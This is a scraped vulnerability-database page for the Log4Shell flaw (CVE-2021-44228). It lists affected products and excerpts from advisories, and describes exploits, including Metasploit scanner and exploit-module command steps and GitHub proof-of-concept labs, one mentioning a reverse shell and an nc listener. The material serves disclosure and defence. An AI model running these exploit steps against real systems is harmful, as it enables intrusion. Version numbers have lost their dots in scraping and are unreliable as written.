10
CVSSv3

CVE-2021-44228

Published: 10/12/2021 Updated: 07/11/2023
CVSS v2 Base Score: 9.3 | Impact Score: 10 | Exploitability Score: 8.6
CVSS v3 Base Score: 10 | Impact Score: 6 | Exploitability Score: 3.9
VMScore: 1000
Vector: AV:N/AC:M/Au:N/C:C/I:C/A:C

Vulnerability Summary

Apache Log4j2 2.0-beta9 up to and including 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

apache log4j 2.0

apache log4j

siemens sppa-t3000 ses3000 firmware

siemens logo! soft comfort

siemens spectrum power 4 4.70

siemens spectrum power 4

siemens siveillance control pro

siemens energyip prepay 3.7

siemens energyip prepay 3.8

siemens siveillance identity 1.6

siemens siveillance identity 1.5

siemens siveillance command

siemens sipass integrated 2.85

siemens sipass integrated 2.80

siemens head-end system universal device integration system

siemens gma-manager

siemens energyip 8.5

siemens energyip 8.6

siemens energyip 8.7

siemens energyip 9.0

siemens energy engage 3.1

siemens e-car operation center

siemens desigo cc info center 5.0

siemens desigo cc info center 5.1

siemens desigo cc advanced reports 4.1

siemens desigo cc advanced reports 4.2

siemens desigo cc advanced reports 5.0

siemens desigo cc advanced reports 5.1

siemens desigo cc advanced reports 4.0

siemens comos

siemens captial 2019.1

siemens navigator

siemens xpedition package integrator -

siemens xpedition enterprise -

siemens vesys 2019.1

siemens vesys

siemens teamcenter

siemens spectrum power 7 2.30

siemens spectrum power 7

siemens solid edge harness design 2020

siemens solid edge harness design

siemens solid edge cam pro

siemens siveillance viewpoint

siemens siveillance vantage

siemens siguard dsa 4.3

siemens siguard dsa 4.4

siemens siguard dsa 4.2

siemens sentron powermanager 4.2

siemens sentron powermanager 4.1

siemens operation scheduler

siemens nx

siemens opcenter intelligence

siemens mindsphere

siemens mendix

siemens industrial edge management hub

siemens industrial edge management

siemens captial

intel audio development kit -

intel system debugger -

intel secure device onboard -

intel oneapi sample browser -

intel sensor solution firmware development kit -

intel computer vision annotation tool -

intel genomics kernel library -

intel system studio -

intel data center manager

debian debian linux 9.0

debian debian linux 10.0

debian debian linux 11.0

fedoraproject fedora 34

fedoraproject fedora 35

sonicwall email security

netapp oncommand insight -

netapp cloud insights -

netapp active iq unified manager -

netapp cloud manager -

netapp cloud secure agent -

netapp ontap tools -

netapp snapcenter -

cisco unified communications manager im and presence service 11.5(1)

cisco unified customer voice portal 11.6

cisco webex meetings server

cisco packaged contact center enterprise 11.6(1)

cisco webex meetings server 3.0

cisco identity services engine

cisco data center network manager

cisco webex meetings server 4.0

cisco unified contact center express

cisco data center network manager 11.3(1)

cisco identity services engine 2.4.0

cisco finesse

cisco finesse 12.6(1)

cisco nexus dashboard

cisco network services orchestrator

cisco iot operations dashboard -

cisco intersight virtual appliance

cisco evolved programmable network manager

cisco dna spaces connector

cisco cyber vision sensor management extension

cisco crosswork zero touch provisioning

cisco crosswork zero touch provisioning 3.0.0

cisco crosswork platform infrastructure

cisco crosswork platform infrastructure 4.1.0

cisco crosswork optimization engine

cisco crosswork optimization engine 3.0.0

cisco crosswork network controller 3.0.0

cisco crosswork network controller

cisco crosswork data gateway 3.0.0

cisco crosswork data gateway

cisco common services platform collector

cisco cloudcenter

cisco cloudcenter workload manager

cisco cloudcenter suite admin

cisco cloudcenter cost optimizer

cisco business process automation

cisco automated subsea tuning

cisco nexus insights

cisco advanced malware protection virtual private cloud appliance

cisco customer experience cloud agent

cisco workload optimization manager

cisco ucs central

cisco ucs director

cisco sd-wan vmanage

cisco optical network controller

cisco fog director -

cisco dna center

cisco integrated management controller supervisor

cisco wan automation engine

cisco virtualized infrastructure manager

cisco network assurance engine

cisco virtual topology system

cisco smart phy

cisco prime service catalog

cisco connected mobile experiences -

cisco video surveillance operations manager

cisco unity connection

cisco virtualized voice browser

cisco unified workforce optimization

cisco unified sip proxy

cisco unified intelligence center

cisco unified customer voice portal

cisco unified customer voice portal 12.0

cisco unified customer voice portal 12.5

cisco unified contact center enterprise

cisco unified contact center enterprise 11.6(2)

cisco unified communications manager im and presence service

cisco unified communications manager

cisco unified communications manager 11.5(1)su3

cisco unified communications manager 11.5(1)

cisco paging server

cisco packaged contact center enterprise

cisco enterprise chat and email

cisco emergency responder

cisco contact center management portal

cisco contact center domain manager

cisco cloud connect

cisco broadworks

cisco fxos 6.2.3

cisco fxos 6.3.0

cisco fxos 6.4.0

cisco fxos 6.5.0

cisco fxos 6.6.0

cisco fxos 6.7.0

cisco fxos 7.0.0

cisco fxos 7.1.0

cisco prime service catalog 12.1

cisco firepower threat defense 6.2.3

cisco firepower threat defense 6.4.0

cisco firepower threat defense 6.3.0

cisco unity connection 11.5

cisco firepower threat defense 6.5.0

cisco firepower threat defense 6.6.0

cisco sd-wan vmanage 20.3

cisco sd-wan vmanage 20.6

cisco sd-wan vmanage 20.5

cisco cyber vision sensor management extension 4.0.2

cisco dna spaces connector -

cisco unified sip proxy 010.002(001)

cisco unified sip proxy 010.002(000)

cisco unified sip proxy 010.000(001)

cisco unified sip proxy 010.000(000)

cisco unified intelligence center 12.6(2)

cisco unified intelligence center 12.6(1)

cisco unified customer voice portal 12.6(1)

cisco unified customer voice portal 12.5(1)

cisco unified customer voice portal 12.0(1)

cisco unified customer voice portal 11.6(1)

cisco unified contact center express 12.5(1)

cisco unified communications manager im & presence service 11.5(1.22900.6)

cisco unified communications manager im & presence service 11.5(1)

cisco unified communications manager 11.5(1.22900.28)

cisco unified communications manager 11.5(1.21900.40)

cisco unified communications manager 11.5(1.18900.97)

cisco unified communications manager 11.5(1.18119.2)

cisco unified communications manager 11.5(1.17900.52)

cisco paging server 9.1(1)

cisco paging server 9.0(2)

cisco paging server 9.0(1)

cisco paging server 8.5(1)

cisco paging server 8.4(1)

cisco paging server 8.3(1)

cisco paging server 14.0(1)

cisco paging server 12.5(2)

cisco unified contact center enterprise 12.6(2)

cisco unified contact center enterprise 12.6(1)

cisco unified contact center enterprise 12.5(1)

cisco unified contact center enterprise 12.0(1)

cisco finesse 12.5(1)

cisco enterprise chat and email 12.6(1)

cisco enterprise chat and email 12.5(1)

cisco enterprise chat and email 12.0(1)

cisco emergency responder 11.5(4.66000.14)

cisco emergency responder 11.5(4.65000.14)

cisco emergency responder 11.5

cisco unified contact center management portal 12.6(1)

cisco unified contact center express 12.6(2)

cisco unified contact center express 12.6(1)

cisco broadworks -

cisco unified computing system 006.008(001.000)

cisco ucs central software 2.0(1l)

cisco ucs central software 2.0(1k)

cisco ucs central software 2.0(1h)

cisco ucs central software 2.0(1g)

cisco ucs central software 2.0(1f)

cisco ucs central software 2.0(1e)

cisco ucs central software 2.0(1d)

cisco ucs central software 2.0(1c)

cisco ucs central software 2.0(1b)

cisco ucs central software 2.0(1a)

cisco ucs central software 2.0

cisco integrated management controller supervisor 2.3.2.0

cisco integrated management controller supervisor 002.003(002.000)

cisco sd-wan vmanage 20.6.1

cisco sd-wan vmanage 20.8

cisco sd-wan vmanage 20.7

cisco sd-wan vmanage 20.4

cisco optical network controller 1.1

cisco network assurance engine 6.0(2.1912)

cisco dna center 2.2.2.8

cisco wan automation engine 7.6

cisco wan automation engine 7.5

cisco wan automation engine 7.4

cisco wan automation engine 7.3

cisco wan automation engine 7.2.3

cisco wan automation engine 7.2.2

cisco wan automation engine 7.2.1

cisco wan automation engine 7.1.3

cisco virtual topology system 2.6.6

cisco smart phy 3.2.1

cisco smart phy 3.1.5

cisco smart phy 3.1.4

cisco smart phy 3.1.3

cisco smart phy 3.1.2

cisco smart phy 21.3

cisco network services orchestrator -

cisco intersight virtual appliance 1.0.9-343

cisco evolved programmable network manager 5.1

cisco evolved programmable network manager 5.0

cisco evolved programmable network manager 4.1

cisco evolved programmable network manager 4.0

cisco evolved programmable network manager 3.1

cisco evolved programmable network manager 3.0

cisco network dashboard fabric controller 11.5(3)

cisco network dashboard fabric controller 11.5(2)

cisco network dashboard fabric controller 11.5(1)

cisco network dashboard fabric controller 11.4(1)

cisco network dashboard fabric controller 11.3(1)

cisco network dashboard fabric controller 11.2(1)

cisco network dashboard fabric controller 11.1(1)

cisco network dashboard fabric controller 11.0(1)

cisco video surveillance manager 7.14(4.018)

cisco video surveillance manager 7.14(3.025)

cisco video surveillance manager 7.14(2.26)

cisco video surveillance manager 7.14(1.26)

cisco unified workforce optimization 11.5(1)

cisco unity connection 11.5(1.10000.6)

cisco cloudcenter suite 5.3(0)

cisco cloudcenter suite 5.5(0)

cisco cloudcenter suite 5.4(1)

cisco automated subsea tuning 02.01.00

cisco identity services engine 003.002(000.116)

cisco identity services engine 003.001(000.518)

cisco identity services engine 003.000(000.458)

cisco identity services engine 002.007(000.356)

cisco identity services engine 002.006(000.156)

cisco identity services engine 002.004(000.914)

cisco firepower threat defense 7.1.0

cisco firepower threat defense 7.0.0

cisco firepower threat defense 6.7.0

cisco network insights for data center 6.0(2.1914)

cisco cx cloud agent 001.012

cisco mobility services engine -

cisco cloudcenter suite 5.5(1)

cisco cloudcenter suite 4.10(0.15)

cisco dna spaces -

cisco cyber vision 4.0.2

cisco connected analytics for network deployment 7.3

cisco connected analytics for network deployment 008.000.000.000.004

cisco connected analytics for network deployment 008.000.000

cisco connected analytics for network deployment 007.003.003

cisco connected analytics for network deployment 007.003.001.001

cisco connected analytics for network deployment 007.003.000

cisco connected analytics for network deployment 007.002.000

cisco connected analytics for network deployment 007.001.000

cisco connected analytics for network deployment 007.000.001

cisco connected analytics for network deployment 006.005.000.000

cisco connected analytics for network deployment 006.005.000.

cisco connected analytics for network deployment 006.004.000.003

cisco crosswork network automation 4.1.1

cisco crosswork network automation 4.1.0

cisco crosswork network automation -

cisco crosswork network automation 3.0.0

cisco crosswork network automation 2.0.0

cisco common services platform collector 002.010(000.000)

cisco common services platform collector 002.009(001.002)

cisco common services platform collector 002.009(001.001)

cisco common services platform collector 002.009(001.000)

cisco common services platform collector 002.009(000.002)

cisco common services platform collector 002.009(000.001)

cisco common services platform collector 002.009(000.000)

snowsoftware vm access proxy

snowsoftware snow commander

bentley synchro 4d

bentley synchro

percussion rhythmyx

Vendor Advisories

Synopsis Critical: Red Hat Process Automation Manager 7120 security update Type/Severity Security Advisory: Critical Topic An update is now available for Red Hat Process Automation ManagerRed Hat Product Security has rated this update as having a security impact of Moderate A Common Vulnerability Scoring System (CVSS) base score, which gi ...
Debian Bug report logs - #1001478 apache-log4j2: CVE-2021-44228: Remote code injection via crafted log messages Package: src:apache-log4j2; Maintainer for src:apache-log4j2 is Debian Java Maintainers <pkg-java-maintainers@listsaliothdebianorg>; Reported by: Salvatore Bonaccorso <carnil@debianorg> Date: Fri, 10 Dec ...
Debian Bug report logs - #1001729 apache-log4j2: CVE-2021-45046: Incomplete fix for CVE-2021-44228 in certain non-default configurations Package: src:apache-log4j2; Maintainer for src:apache-log4j2 is Debian Java Maintainers <pkg-java-maintainers@listsaliothdebianorg>; Reported by: Salvatore Bonaccorso <carnil@debianor ...
Chen Zhaojun of Alibaba Cloud Security Team discovered a critical security vulnerability in Apache Log4j, a popular Logging Framework for Java JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints An attacker who can control log messages or log message pa ...
It was found that the fix to address CVE-2021-44228 in Apache Log4j, a Logging Framework for Java, was incomplete in certain non-default configurations This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:l ...
A flaw was found in the Java logging library Apache Log4j 2 in versions from 200 and before and including 2141 which could allow a remote attacker to execute code on the server if the system logs an attacker controlled string value with the attacker's JNDI LDAP server lookup The highest threat from the vulnerability is to data confidentiality ...
No versions of an Amazon Linux Java Virtual Machine (JVM) are affected by CVE-2021-44228 or CVE-2021-45046 However, if customers load a log4j version that is affected by CVE-2021-44228 or CVE-2021-45046 into an Amazon Linux JVM, it will introduce the issues identified in CVE-2021-44228 and CVE-2021-45046 into the JVM This update modifies Amazon L ...
Apache Log4j2 <=2141 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled From log4j 2 ...
Critical Vulnerabilities in Apache Log4j Java Logging Library On December 9, 2021, the following critical vulnerability in the Apache Log4j Java logging library affecting all Log4j2 versions earlier than 2150 was disclosed: CVE-2021-44228: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoin ...
Amazon Kinesis Agent versions within Amazon Linux 2 (AL2) prior to aws-kinesis-agent-204-1 included a version of Apache Log4j affected by CVE-2021-44228 and CVE-2021-45046 The Amazon Kinesis Agent has been updated to aws-kinesis-agent-204-1 within Amazon Linux 2 that mitigates CVE-2021-44228 and CVE-2021-45046 For additional detail see https: ...
No versions of an Amazon Linux Java Virtual Machine (JVM) are affected by CVE-2021-44228 or CVE-2021-45046 However, if customers load a log4j version that is affected by CVE-2021-44228 or CVE-2021-45046 into an Amazon Linux JVM, it will introduce the issues identified in CVE-2021-44228 and CVE-2021-45046 into the JVM This update modifies Amazon L ...
No versions of an Amazon Linux Java Virtual Machine (JVM) are affected by CVE-2021-44228 or CVE-2021-45046 However, if customers load a log4j version that is affected by CVE-2021-44228 or CVE-2021-45046 into an Amazon Linux JVM, it will introduce the issues identified in CVE-2021-44228 and CVE-2021-45046 into the JVM This update modifies Amazon L ...
No versions of an Amazon Linux Java Virtual Machine (JVM) are affected by CVE-2021-44228 or CVE-2021-45046 However, if customers load a log4j version that is affected by CVE-2021-44228 or CVE-2021-45046 into an Amazon Linux JVM, it will introduce the issues identified in CVE-2021-44228 and CVE-2021-45046 into the JVM This update modifies Amazon L ...
A vulnerability (CVE-2021-44228) exists in Hitachi Device Manager, Hitachi Infrastructure Analytics Advisor, Hitachi Automation Director, Hitachi Ops Center Analyzer, Hitachi Ops Center Automator and Hitachi Ops Center Administrator Affected products and versions are listed below Please upgrade your version to the appropriate version, or apply ...
A vulnerability (CVE-2021-44228) exists in Hitachi Storage Plug-in for VMware vCenter Affected products and versions are listed below Please upgrade your version to the appropriate version, or apply the Workarounds ...
A vulnerability exists in JP1/VERITAS Affected products and versions are listed below Please upgrade your version to the appropriate version ...
A flaw was found in the Java logging library Apache Log4j 2 in versions from 20-beta9 and before and including 2141 This could allow a remote attacker to execute code on the server if the system logs an attacker-controlled string value with the attacker's JNDI LDAP server lookup (CVE-2021-44228) ...
ALAS-2022-225 Amazon Linux 2022 Security Advisory: ALAS-2022-225 Advisory Release Date: 2022-12-06 16:42 Pacific ...
Citrix is aware of four vulnerabilities affecting Apache Log4j2, three of which may allow an attacker to execute arbitrary code These three vulnerabilities have been given the following identifiers:  ...
Sign up for Security Advisories Stay up to date on the latest VMware Security advisories and updates ...

ICS Advisories

Exploits

Apache Log4j2 versions 20-beta-9 and 2141 remote code execution exploit ...
Apache Log4j2 versions 2141 and below information disclosure exploit ...
The latest version (51) and all prior versions of Intel's Data Center Manager are vulnerable to a local privileges escalation vulnerability using the application user "dcm" used to run the web application and the rest interface An attacker who gained remote code execution using this dcm user (ie, through Log4j) is then able to escalate their pr ...
This Metasploit module will exploit an HTTP end point with the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit and load a payload The Automatic target delivers a Java payload using remote class loading This requires Metasploit to run an HTTP server in addition to the LDAP server that the ta ...
MobileIron Core is affected by the Log4Shell vulnerability whereby a JNDI string sent to the server will cause it to connect to the attacker and deserialize a malicious Java object This results in OS command execution in the context of the tomcat user This Metasploit module will start an LDAP server that the target will need to connect to ...
VMware vCenter Server is affected by the Log4Shell vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and deserialize a malicious Java object This results in OS command execution in the context of the root user in the case of the Linux virtual appliance and SYSTEM on Windows This Metasploit ...
Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration, log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints This module will scan an HTTP end point for the Log4Shell vulnerability by injecting a format message that will ...
Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration, log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints This module will exploit an HTTP end point with the Log4Shell vulnerability by injecting a format message that ...

Mailing Lists

Severity: critical Description: Apache Log4j2 <=2141 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup s ...
Description: JMSAppender in Log4j 12 is vulnerable to deserialization of untrusted data when the attacker has write access to the Log4j configuration The attacker can provide TopicBindingName and TopicConnectionFactoryBindingName configurations causing JMSAppender to perform JNDI requests that result in remote code execution in a similar fashi ...
Hello, To emphasize again: this needs write access to the Log4j configuration Moritz ...
Severity: moderate (CVSS: 37 AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L) Description: It was found that the fix to address CVE-2021-44228 in Apache Log4j 2150 was incomplete in certain non-default configurations This could allows attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Patte ...
Hi Ron, Is there any information on the non-default configuration that triggers the DoS? What I am trying to understand is, if we clear the first CVE through, say, envar LOG4J_FORMAT_MSG_NO_LOOKUPS=true or -Dlog4j2formatMsgNoLookups=true, then where does the vulnerability lie for the second CVE? What configuration change needs to be done to re ...

Metasploit Modules

Log4Shell HTTP Scanner

Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration, log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints. This module will scan an HTTP end point for the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit. This module is a generic scanner and is only capable of identifying instances that are vulnerable via one of the pre-determined HTTP request injection points. These points include HTTP headers and the HTTP request path. Known impacted software includes Apache Struts 2, VMWare VCenter, Apache James, Apache Solr, Apache Druid, Apache JSPWiki, Apache OFBiz.

msf > use auxiliary/scanner/http/log4shell_scanner
msf auxiliary(log4shell_scanner) > show actions
    ...actions...
msf auxiliary(log4shell_scanner) > set ACTION < action-name >
msf auxiliary(log4shell_scanner) > show options
    ...show and set options...
msf auxiliary(log4shell_scanner) > run
Log4Shell HTTP Header Injection

Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration, log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints. This module will exploit an HTTP end point with the Log4Shell vulnerability by injecting a format message that will trigger an LDAP connection to Metasploit and load a payload. The Automatic target delivers a Java payload using remote class loading. This requires Metasploit to run an HTTP server in addition to the LDAP server that the target can connect to. The targeted application must have the trusted code base option enabled for this technique to work. The non-Automatic targets deliver a payload via a serialized Java object. This does not require Metasploit to run an HTTP server and instead leverages the LDAP server to deliver the serialized object. The target application in this case must be compatible with the user-specified JAVA_GADGET_CHAIN option.

msf > use exploit/multi/http/log4shell_header_injection
msf exploit(log4shell_header_injection) > show targets
    ...targets...
msf exploit(log4shell_header_injection) > set TARGET < target-id >
msf exploit(log4shell_header_injection) > show options
    ...show and set options...
msf exploit(log4shell_header_injection) > exploit

Github Repositories

Hello there I am Tomáš Kašpárek, software engineering manager with extensive software engineering and security background currently working at Red Hat My projects and work experience tkasparek-rainduckdnsorg small personal project providing a better view on rain data in the Czech republic Hosted on Oracle Free Cloud, running on Oracle Li

WARNING: DO NOT USE FOR PRODUCTION! This is a demo / proof of concept Patching container images Motivation Container images are meant to be immutable Any changes should be done by rebuilding the image When faced with a critical vulnerability such as log4shell, one might have very little time to remedy the situation In the optimal case there is a fix available and the conta

Appenders for Log4J 1.2.x, Log4J 2.x, and Logback that write to AWS destinations.

log4j-aws-appenders Appenders for Log4J 1x, Log4J 2x and Logback that write to various AWS destinations: CloudWatch Logs: AWS-native centralized log management, providing keyword and time range search Kinesis Streams: the first step in a logging pipeline that feeds Elasticsearch and other analytics destinations SNS: useful for real-time error notifications In addition to

Web-Pentesting-Resources

Web-Pentesting-Resources Web-Pentesting-Resources - will be updated permanently nuclei templates Recon JS files hidden files (google, bing, yahoo, etc) SQLi all types XSS all types (encoding) SSRF all types CSRF all types Command Injection LFI, RFI all types IDOR all types Race condition XXE Injection SSTI injection Request Smuggling Open Redirect file upload deserialization

Awesome-Redteam 【免责声明】本仓库所涉及的技术、思路和工具仅供安全技术研究,任何人不得将其用于非授权渗透测试,不得将其用于非法用途和盈利,否则后果自行承担。 快速导航 攻防渗透常用命令 重要端口及服务速查 目录 Awesome-Redteam 快速导航 目录 项目导航 速查文档-CheatSheets

Demonstrated Log4j 2.15 Vulnerability by creating vulnerable Application server and attacker server.Performed remote code execution,mining and reverse shell on Vulnerable App Server from Attacker server.

Simulation-of-Log4j-Vulnerability This project demonstrate various possible attacks on an Application server using vulnerable version 215 (Officially labeled CVE-2021-44228) and known as "Log4Shell"We created an Attacker server and a Vulnerable server for demonstrationAttacker server contains a remote repository to store data from vulnerable server,an LDAP server w

Proof of concept of the Log4Shell vulnerability (CVE-2021-44228)

CVE-2021-44228 Proof of concept of the Log4Shell vulnerability (CVE-2021-44228)

find file

findfile Script en bash para buscar ficheros, cadenas de texto, IPs , en Linux/Unix por ejemplo, versiones hasta log4j-core-2141jar, afectadas por vulnerabilidad Log4Shell CVE-2021-44228 find / |grep log4j-core-2*jar find / ( -fstype ext4 -or -fstype ext3 ) -type f -name "log4j-core-2*jar" corregida la vuln a partir de la version: log4j-core-2161jar find

CVE-2021-44228 POC / Example

CVE-2021-44228-poc CVE-2021-44228 POC / Example

POC for CVE-2021-44228 within Springboot

log4j Spring vulnerable POC This is a POC for a simple spring boot start backend with maven including vulnerable log4j version for CVE-2021-44228 Spring boot bootstrapped with startspringio commands /mvnw spring-boot:run: start server /mvnw dependency:tree: print dependency tree and check for log4j version in use nc -k -l 3030: bash, start server socket to listen

Log4j2组件命令执行RCE / Code By:Jun_sheng

CVE-2021-44228 Log4j2组件命令执行RCE Code By:Jun_sheng @橘子网络安全实验室 橘子网络安全实验室 0rangeteam/ 0x00 风险概述 本工具仅限授权安全测试使用,禁止未授权非法攻击站点 在线阅读《中华人民共和国网络安全法》 0x01 工具使用 运行中提示 0x02 注意 本工具调用JNDI注入工具进行漏洞攻

Ejemplos de estudio para la vulnerabilidad Log4Shell

Análisis técnico de la vulnerabilidad Log4Shell Ejemplos de estudio para la vulnerabilidad Log4Shell Log4Shell fue (¿es?) una vulnerabilidad descubierta a finales de noviembre del 2021 (CVE-2021-44228) por la que un atacante podría ejecutar código malicioso dentro de un servidor ajeno de una forma extremadamente simple y que casi puso internet

public snap labs templates dashboardsnaplabsio/templates/098f6f57-d9ca-43cc-4a18-0c4ef8e00447 Name Log4Shell Description Lab to play with the log4shell (CVE-2021-44228) vulnerability Estimated Running Cost $0097/hour dashboardsnaplabsio/templates/fa55d16d-1ecd-4240-7d61-abd5d0d5a152 Name Entry Level Pentesting Description This lab simulates a penetration t

this is a simple java application that use the the log4j library, clone it and open it with your intillij, install the requirement and follow me on the youtube video

log4j CVE-2021-44228 i get this from the liveoverflow repository, i just delete the xml configuration file and the main class because we build them from scratch in the youtube video Setup *) open the project using intellij IDEA **) install maven ***) and if you don't minde follow me in the video the video link: youtube/xdkcUq3iCGQ

お知らせ 2022年3月29日下記変更によりgbizconnect-nodeのバージョンがv200になりました。 Gビズコネクトのドメインが「gbiz-connectgojp」に変わりました。 ログ転送機能のOSがRedHat Universal Base Images Minimal 85に変わりました。 2021年12月20日「Apache Log4j」の脆弱性(CVE-2021-44228)について、対策

Find log4j for CVE-2021-44228 on some places * Log4Shell

find-log4j Find log4j for CVE-2021-44228 on some places * Log4Shell

VGW Techtonic 2022 - Vulnerabilities The purpose of this workshop is to educate you on the risks that software vulnerabilities pose and how they are introduced We will focus on how to find these vulnerabilities within your applications and exploiting them You will also be taught how to patch these vulnerabilities and reducing your attack surface to mitigate risk 1 Setup To

MusicBrainz Solr query response writer

MusicBrainz Solr This package includes a QueryResponseWriter for Apache Solr that will generate mmd-schema compliant responses for Solr cores running on an mbsssss schema Licensing Note - Part of the code at orgmusicbrainzsearchanalysis is adapted almost entirely from Lucene core libs As such those files are licensed under Apache 20 license which is compatible with the e

Awesome Stars A curated list of my GitHub stars! Generated by starred Contents Assembly Awk Batchfile Brainfuck C C# C++ CSS Clojure Common Lisp Crystal D Dart Dockerfile Elixir Emacs Lisp FreeMarker Go Groovy HTML Haskell Java JavaScript Jinja Jupyter Notebook Just Kotlin Less Lua M4 Makefile Markdown Nginx Nim OCaml Objective-C Others PHP PLpgSQL Pascal Perl PowerShell P

Log4Shell (CVE-2021-44228) docker lab

Log4Shell docker lab for CVE-2021-44228 The components This docker lab makes use of three components, being: The vulnerable spring-boot application An HTTP server that hosts class files used for remote code execution An LDAP referral server which redirects specific LDAP queries to the HTTP server Docker lab setup 1 Docker network docker network create log4shell

CVE-2021-44228_scanner (modified) - Deprecated Original Script and Repo: githubcom/CERTCC/CVE-2021-44228_scanner Modified by: Alex Pena Applications that are vulnerable to the log4j CVE-2021-44228 issue may be detectable by scanning jar, war, and ear files to search for the presence of JndiLookupclass Any file discovered is worth investigation to determine if the app

Demonstration of CVE-2021-44228 with a possible strategic fix.

Simple Example showing CVE-2021-44228 in action Explanation To reproduce this issue, I am removing the transitive dependency for logging from SpringBoot Instead, I am bringing in spring-boot-starter-log4j2 spring-boot-starter-log4j2 brings in log4j-core which has the remote code exploit (RCE) vulnerability Running API Either run the command /gradlew clean build bootRun in

Introduction I wanted to learn more about the internals of CVE-2021-44228 and see it in action, so I put together a basic PoC that simulates it; maybe someone else is interested in playing around with it A lot has been researched and written about this vulnerability already, but a basic breakdown of how this PoC works: log4j interprets strings instead of just writing them to

Prerequisites Three clusters: mgmt: Hosts the Gloo Mesh Management plane cluster1: Hosts workloads cluster2: Hosts workloads Workload clusters have Istio and the Gloo Mesh agent installed, and those are connected to the Gloo Mesh management plane This should be the starting state: Sample services are found in this repo, which is a fork of fake-service nicholasjackson/fake-s

Log4Shell sample vulnerable application (CVE-2021-44228) This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell It uses Log4j 2141 (through spring-boot-starter-log4j2 261) and the JDK 180_181 Running the application Run it: docker run --name vulnerable-app --rm -p 8080:8080 ghcrio/christophetd/log4shell-vulnerable-app

log4j2 Log4Shell CVE-2021-44228 proof of concept

Log4Shell CVE-2021-44228 proof of concept Requirement Java (JDK/JRE) 8 or later version curl exploitable Simple spring boot application that serves a login page with user and password It logs the user name when POSTed to / It is not required for the application to log any user provided input Enabling access logging that uses a vulnerable version of log4j2 is sufficient Ho

A Remote Code Execution PoC for Log4Shell (CVE-2021-44228)

CVE-2021-44228 Remote Command Execution PoC This repository allows security researchers to experiment with remote code execution by offering an implementation of an attack server that loads a custom exploit on a vulnerable application that contains log4j ⚠️ The tool is intended for self-assessment and should be used by authorized persons or researchers only You should on

Log4j2-Fuzz __ __ __ _ ___ ______ / / ____ ____ _/ // / (_)__ \ / ____/_ __________ / / / __ \/ __ '/ // /_/ /__/ /_____/ /_ / / / /_ /_ / / /___/ /_/ / /_/ /__ __/ // __/_____/ __/ / /_/ / / /_/ /_ /_____/\____/\__, / /_/_/ //____/ /_/ \__,_/ /___/___/ /____/ /___/ CVE-2021-44228#Dghp

a irresponsibly bad logging library

an irresponsibly bad logging library Is CVE-2021-44228 making you feel left out as a Go programmer? Fear not We can fix that I wouldn't use this package, but if you want to package main import "githubcom/bradfitz/jndi" var logger = jndiNewLogger() func main() { // } func handleSomeTraffic(r *request) { loggerPrintf("got request from %

Intentionally vulnerable application that explores the Log4Shell vulnerability in Log4J, a popular Java logging framework. With this vulnerability known under "remote code execution" (RCE) otherwise known as "arbitrary code execution"

Log4Shell Intentionally vulnerable application that explores the Log4Shell zero-day vulnerability in Log4J, a popular Java logging framework With this vulnerability known under "remote code execution" (RCE) otherwise known as "arbitrary code execution" This vulnerability is also known as CVE-2021-44228 which was on older versions of Java such as Java 8u202

AWS Shell for FireSim

AWS FPGA Shell for FireSim This is a fork of aws-fpga used for FireSim More information about this repo can be found in the FireSim Changelog Below is the standard aws-fpga documentation from upstream Table of Contents Overview of AWS EC2 FPGA Development Kit Developer Support Development Flow Development environments FPGA Developer AMI FPGA Hardware Development Kit (HDK)

log4shell vulnerable app This is a basic, minimal, intentionally vulnerable Java web application including a version (2141) of the log4j library affected by the infamous log4shell (CVE-2021-44228) vulnerability build and run instructions Gradle wrapper should solve everything Simply git clone the repo: git clone githubcom/tothi/log4shell-vulnerable-app

Java agent that disables Apache Log4J's JNDI Lookup. Fixes CVE-2021-44228, aka "Log4Shell."

Log4NoShell A Java Agent that disables Apache Log4J's JNDI Lookup to aid against CVE-2021-44228 ("Log4Shell") If possible, update your program to use the latest Log4J version, as the vulnerability is fixed as of version 2171 Otherwise, download log4noshell-04-SNAPSHOT-shadedjar and continue reading Usage To use Java Agents, you must specify them with the -

One-and-only-port Log4Shell vulnerability tester This is a lightweight vulnerability tester for the Log4Shell vulnerability (CVE-2021-44228) It is designed to run both LDAP and HTTP server on the same port for some ease of use in some organisations The script is delivered as a one single file for ease of "deployment" in some cases where you can't access internet

Collection of templates from various resources

